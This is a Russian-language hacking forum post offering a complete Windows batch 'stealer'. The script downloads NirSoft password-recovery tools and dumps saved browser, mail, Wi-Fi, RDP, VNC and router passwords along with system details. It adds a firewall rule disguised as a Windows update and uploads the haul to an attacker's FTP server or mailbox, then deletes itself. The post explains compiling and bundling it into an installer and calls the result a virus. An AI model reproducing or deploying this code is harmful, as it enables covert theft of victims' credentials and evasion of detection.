Идею подкинул так сказать плавающий в сети как бы стилер,на самом деле батинок и пару exe'шников,идея не плохая,но реализованно не очень,вообщем пришло мне в голову его переделать и вот что получилось: Код самого батинка не много переписал,теперь он выглядит так: Код: @echo off md %Systemdrive%\DriverStoreis\ :: устанавливаем переменную в которую в дальнейшем скинем set passdir=%Systemdrive%\DriverStoreis set progpath=%Systemdrive%\Draiver :: Скачиваем необходимые файлы "%progpath%\wget" --tries=3 -O "%progpath%\mspass.zip" http://www.nirsoft.net/utils/mspass.zip "%progpath%\wget" --tries=3 -O "%progpath%\mailpv.zip" http://www.nirsoft.net/utils/mailpv.zip "%progpath%\wget" --tries=3 -O "%progpath%\iepv.zip" http://www.nirsoft.net/utils/iepv.zip "%progpath%\wget" --tries=3 -O "%progpath%\passwordfox.zip" http://www.nirsoft.net/utils/passwordfox.zip "%progpath%\wget" --tries=3 -O "%progpath%\chromepass.zip" http://www.nirsoft.net/utils/chromepass.zip "%progpath%\wget" --tries=3 -O "%progpath%\wirelesskeyview.zip" http://www.nirsoft.net/utils/wirelesskeyview.zip "%progpath%\wget" --tries=3 -O "%progpath%\pspv.zip" http://www.nirsoft.net/utils/pspv.zip "%progpath%\wget" --tries=3 -O "%progpath%\dialupass.zip" http://www.nirsoft.net/utils/dialupass.zip "%progpath%\wget" --tries=3 -O "%progpath%\bulletspassview.zip" http://www.nirsoft.net/utils/bulletspassview.zip "%progpath%\wget" --tries=3 -O "%progpath%\netpass.zip" http://www.nirsoft.net/utils/netpass.zip "%progpath%\wget" --tries=3 -O "%progpath%\routerpassview.zip" http://www.nirsoft.net/utils/routerpassview.zip "%progpath%\wget" --tries=3 -O "%progpath%\pstpassword.zip" http://www.nirsoft.net/utils/pstpassword.zip "%progpath%\wget" --tries=3 -O "%progpath%\webbrowserpassview.zip" http://www.nirsoft.net/utils/webbrowserpassview.zip "%progpath%\wget" --tries=3 -O "%progpath%\rdpv.zip" http://www.nirsoft.net/utils/rdpv.zip "%progpath%\wget" --tries=3 -O "%progpath%\vncpassview.zip" http://www.nirsoft.net/utils/vncpassview.zip "%progpath%\wget" --tries=3 -O "%progpath%\remotepocketasterisk.zip" http://www.nirsoft.net/pocket_pc/remotepocketasterisk.zip ::Распаковываем dir /b /s %Systemdrive%\Draiver\*.zip>%Systemdrive%\Draiver\z.lst for /f "delims==" %%i in (%Systemdrive%\Draiver\z.lst) do ( echo %%~dpi pushd "%%~dpi" if not exist ".\%%~ni" md ".\%%~ni" "%progpath%\arch.exe" /ext "%%~nxi" ".\%%~ni" popd ) del /f /q %Systemdrive%\Draiver\z.lst :: перекидываем все файлы в одну папку cd %Systemdrive%\Draiver\bulletspassview\ xcopy /y BulletsPassView.exe %passdir% cd.. cd %Systemdrive%\Draiver\chromepass\ xcopy /y ChromePass.exe %passdir% cd.. cd %Systemdrive%\Draiver\dialupass\ xcopy /y Dialupass.exe %passdir% cd.. cd %Systemdrive%\Draiver\iepv\ xcopy /y iepv.exe %passdir% cd.. cd %Systemdrive%\Draiver\mailpv\ xcopy /y mailpv.exe %passdir% cd.. cd %Systemdrive%\Draiver\mspass\ xcopy /y mspass.exe %passdir% cd.. cd %Systemdrive%\Draiver\netpass\ xcopy /y netpass.exe %passdir% cd.. cd %Systemdrive%\Draiver\passwordfox\ xcopy /y PasswordFox.exe %passdir% cd.. cd %Systemdrive%\Draiver\pspv\ xcopy /y pspv.exe %passdir% cd.. cd %Systemdrive%\Draiver\pstpassword\ xcopy /y pstpassword.exe %passdir% cd.. cd %Systemdrive%\Draiver\rdpv\ xcopy /y rdpv.exe %passdir% cd.. cd %Systemdrive%\Draiver\remotepocketasterisk\ xcopy /y remotepocketasterisk.exe %passdir% cd.. cd %Systemdrive%\Draiver\routerpassview\ xcopy /y routerpassview.exe %passdir% cd.. cd %Systemdrive%\Draiver\vncpassview\ xcopy /y vncpassview.exe %passdir% cd.. cd %Systemdrive%\Draiver\webbrowserpassview\ xcopy /y webbrowserpassview.exe %passdir% cd.. cd %Systemdrive%\Draiver\wirelesskeyview\ xcopy /y WirelessKeyView.exe %passdir% cd.. cls :: Сдираем пасы cd %passdir% "%passdir%\BulletsPassView.exe" /stext "%passdir%\BulletsPassView.txt" %passdir%\ChromePass.exe /stext %passdir%\ChromePass.txt %passdir%\Dialupass.exe /stext %passdir%\Dialupass.txt %passdir%\iepv.exe /stext %passdir%\iepv.txt %passdir%\mailpv.exe /stext %passdir%\mailpv.txt %passdir%\mspass.exe /stext %passdir%\mspass.txt %passdir%\netpass.exe /stext %passdir%\netpass.txt %passdir%\PasswordFox.exe /stext %passdir%\PasswordFox.txt %passdir%\pspv.exe /stext %passdir%\pspv.txt %passdir%\pstpassword.exe /stext %passdir%\pstpassword.txt %passdir%\rdpv.exe /stext %passdir%\rdpv.txt %passdir%\remotepocketasterisk.exe /stext %passdir%\remotepocketasterisk.txt %passdir%\routerpassview.exe /stext %passdir%\routerpassview.txt %passdir%\vncpassview.exe /stext %passdir%\vncpassview.txt %passdir%\webbrowserpassview.exe /stext %passdir%\webbrowserpassview.txt %passdir%\WirelessKeyView.exe /stext %passdir%\WirelessKeyView.txt :: собираем инфу systeminfo>%passdir%\system.txt ipconfig /all>%passdir%\ip.txt mem>%passdir%\memory.txt net start>%passdir%\services.txt ver>%passdir%\build.txt tlntadmn>%passdir%\localhost.txt net user>%passdir%\networkusers.txt tasklist>%passdir%\tasklist.txt schtasks>%passdir%\taskname.txt mountvol>%passdir%\disks.txt echo %time%>%passdir%\time.txt echo %username>%passdir%\user.txt echo %date%>%passdir%\date.txt :: крепим всё в один текстовый файл copy %passdir%\system.txt + %passdir%\ip.txt + %passdir%\memory.txt + %passdir%\services.txt + %passdir%\build.txt + %passdir%\localhost.txt + %passdir%\networkusers.txt + %passdir%\tasklist.txt + %passdir%\taskname.txt + %passdir%\disks.txt + %passdir%\time.txt + %passdir%\user.txt + %passdir%\date.txt + %passdir%\BulletsPassView.txt + %passdir%\ChromePass.txt + %passdir%\Dialupass.txt + %passdir%\iepv.txt + %passdir%\mailpv.txt + %passdir%\mspass.txt + %passdir%\netpass.txt + %passdir%\PasswordFox.txt + %passdir%\pspv.txt + %passdir%\pstpassword.txt + %passdir%\rdpv.txt + %passdir%\remotepocketasterisk.txt + %passdir%\routerpassview.txt + %passdir%\vncpassview.txt + %passdir%\webbrowserpassview.txt + %passdir%\WirelessKeyView.txt %passdir%\%computername%-%date%.txt :: кидаем в доверенные фаервола FTP netsh advfirewall firewall add rule name="Indication Updtae Windows" dir=in program=ftp security=notrequired action=allow :: кидаем команды FTP в текстовый файл и выполняем их echo open ftp-хост>%passdir%\send_ftp.tmp echo user логин>>%passdir%\send_ftp.tmp echo пароль>>%passdir%\send_ftp.tmp echo send %passdir%\%computername%-%date%.txt>>%passdir%\send_ftp.tmp echo bye>>%passdir%\send_ftp.tmp ftp.exe -n -i -s:%passdir%\send_ftp.tmp :: удаляем папки rd /s /q %Systemdrive%\Draiver rd /s /q %passdir% :: самоудаляемся echo @echo off>%temp%\bdr.bat echo del /s /q %0>>%temp%\bdr.bat echo del /s /q %0%>>%temp%\bdr.bat echo exit>>%temp%\bdr.bat start /min %temp%\bdr.bat exit Заменяем ftp-хост,логин и пароль на свои от FTP сервера куда будет лететь отчёт и можно смело компилировать в exe,берём файл wget (скачать) и arch.exe далее склеиваем при помощи Smart Install Maker ,путь выгрузки для батинка %tempdir%,для wget and arch %Systemdrive%\Draiver\,на запуск ставим батинок и радуемся пасами в чистом виде у себя на FTP сервере,если захочется на мыло,то часть батинка с отправкой: Код: netsh advfirewall firewall add rule name="Indication Updtae Windows" dir=in program=ftp security=notrequired action=allow echo open ftp-хост>%passdir%\send_ftp.tmp echo user логин>>%passdir%\send_ftp.tmp echo пароль>>%passdir%\send_ftp.tmp echo send %passdir%\%computername%-%date%.txt>>%passdir%\send_ftp.tmp echo bye>>%passdir%\send_ftp.tmp ftp.exe -n -i -s:%passdir%\send_ftp.tmp меняем на: Код: netsh advfirewall firewall add rule name="Update Windows" dir=in program="%passdir%\sendmail.exe" security=notrequired action=allow %passdir%\sendmail.exe /smtpserver smtp.server.in /to to@servermail.lv /from from@server.in /subject Theme mail /body body text /attachment %passdir%\%computername%-%date%.txt /user from /password password Правда с версией отправки на почту придётся добавить файл sendmail.exe,его кидаем в папку с wget,что писал выше,в итоге получаем полноценный вирус который будет тащить пасы какие только есть(практически) и отправлять на FTP сервер или почтовый ящик. ©SwAp TheHackWorld.in